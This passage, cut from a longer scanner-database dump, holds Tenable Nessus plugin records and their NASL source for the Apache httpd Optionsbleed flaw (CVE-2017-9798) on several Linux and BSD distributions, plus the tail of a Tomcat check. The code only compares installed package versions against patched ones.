value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\ntomcat_check_version(fixed:\"7.0.82\", min:\"7.0\", severity:SECURITY_WARNING, granularity_regex:\"^7(\\.0)?$\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:10:50", "description": "The Fuzzing Project reports :\n\nApache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. 
Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.", "cvss3": {}, "published": "2017-09-20T00:00:00", "type": "nessus", "title": "FreeBSD : Apache -- HTTP OPTIONS method can leak server memory (76b085e2-9d33-11e7-9260-000c292ee6b8) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache22", "p-cpe:/a:freebsd:freebsd:apache24", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_76B085E29D3311E79260000C292EE6B8.NASL", "href": "https://www.tenable.com/plugins/nessus/103344", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103344);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"FreeBSD : Apache -- HTTP OPTIONS method can leak server memory (76b085e2-9d33-11e7-9260-000c292ee6b8) (Optionsbleed)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Fuzzing Project reports :\n\nApache httpd allows remote attackers to read secret data from process\nmemory if the Limit directive can be set in a user's .htaccess file,\nor if httpd.conf has certain misconfigurations, aka Optionsbleed. This\naffects the Apache HTTP Server through 2.2.34 and 2.4.x through\n2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request\nwhen attempting to read secret data. This is a use-after-free issue\nand thus secret data is not always sent, and the specific data depends\non many factors including configuration. 
Exploitation with .htaccess\ncan be blocked with a patch to the ap_limit_section function in\nserver/core.c.\"\n );\n # https://vuxml.freebsd.org/freebsd/76b085e2-9d33-11e7-9260-000c292ee6b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5a9655b5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache22\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24<2.4.27_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"apache22<2.2.34_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:00:56", "description": "New httpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, 14.2, and -current to fix a security issue.", "cvss3": {}, "published": "2017-09-19T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : httpd (SSA:2017-261-01) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:httpd", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2017-261-01.NASL", "href": "https://www.tenable.com/plugins/nessus/103306", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were 
\n# extracted from Slackware Security Advisory 2017-261-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103306);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-9798\");\n script_xref(name:\"SSA\", value:\"2017-261-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : httpd (SSA:2017-261-01) (Optionsbleed)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New httpd packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, 14.2, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.551634\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bf69bb8a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"i486\", pkgnum:\"2_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.34\", 
pkgarch:\"x86_64\", pkgnum:\"2_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"i486\", pkgnum:\"2_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"i486\", pkgnum:\"2_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.2.34\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"i486\", pkgnum:\"2_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"i486\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"i586\", pkgnum:\"2_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"i586\", pkgnum:\"3\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.27\", pkgarch:\"x86_64\", pkgnum:\"3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:01:22", "description": "This update for apache2 fixes 
the following security issue :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that allowed for an information leak via OPTIONS (bsc#1058058).\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {}, "published": "2017-09-22T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-2017-1083) (Optionsbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-event", "p-cpe:/a:novell:opensuse:apache2-event-debuginfo", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "cpe:/o:novell:opensuse:42.2", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2017-1083.NASL", "href": "https://www.tenable.com/plugins/nessus/103399", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1083.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103399);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-2017-1083) (Optionsbleed)\");\n script_summary(english:\"Check for the openSUSE-2017-1083 patch\");\n\n script_set_attribute(\n 
attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for apache2 fixes the following security issue :\n\n - CVE-2017-9798: Prevent use-after-free use of memory that\n allowed for an information leak via OPTIONS\n (bsc#1058058).\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1058058\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-debugsource-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-devel-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-event-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-event-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-example-pages-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-prefork-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-prefork-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-utils-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", 
reference:\"apache2-utils-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-worker-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-worker-debuginfo-2.4.23-8.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-debuginfo-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-debugsource-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-devel-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-event-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-event-debuginfo-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-example-pages-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-prefork-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-prefork-debuginfo-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-utils-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-utils-debuginfo-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-worker-2.4.23-16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-worker-debuginfo-2.4.23-16.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-debuginfo / apache2-debugsource / apache2-devel / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:01:44", "description": "According to the version of the httpd packages installed, the EulerOS 
installation on the remote host is affected by the following vulnerability :\n\n - A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-11-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : httpd (EulerOS-SA-2017-1252)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:httpd", "p-cpe:/a:huawei:euleros:httpd-devel", "p-cpe:/a:huawei:euleros:httpd-manual", "p-cpe:/a:huawei:euleros:httpd-tools", "p-cpe:/a:huawei:euleros:mod_ssl", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1252.NASL", "href": "https://www.tenable.com/plugins/nessus/104277", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104277);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-9798\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : httpd (EulerOS-SA-2017-1252)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the httpd packages installed, the EulerOS\ninstallation on the remote host is affected by the 
following\nvulnerability :\n\n - A use-after-free flaw was found in the way httpd\n handled invalid and previously unregistered HTTP\n methods specified in the Limit directive used in an\n .htaccess file. A remote attacker could possibly use\n this flaw to disclose portions of the server memory, or\n cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1252\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d09c3870\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", 
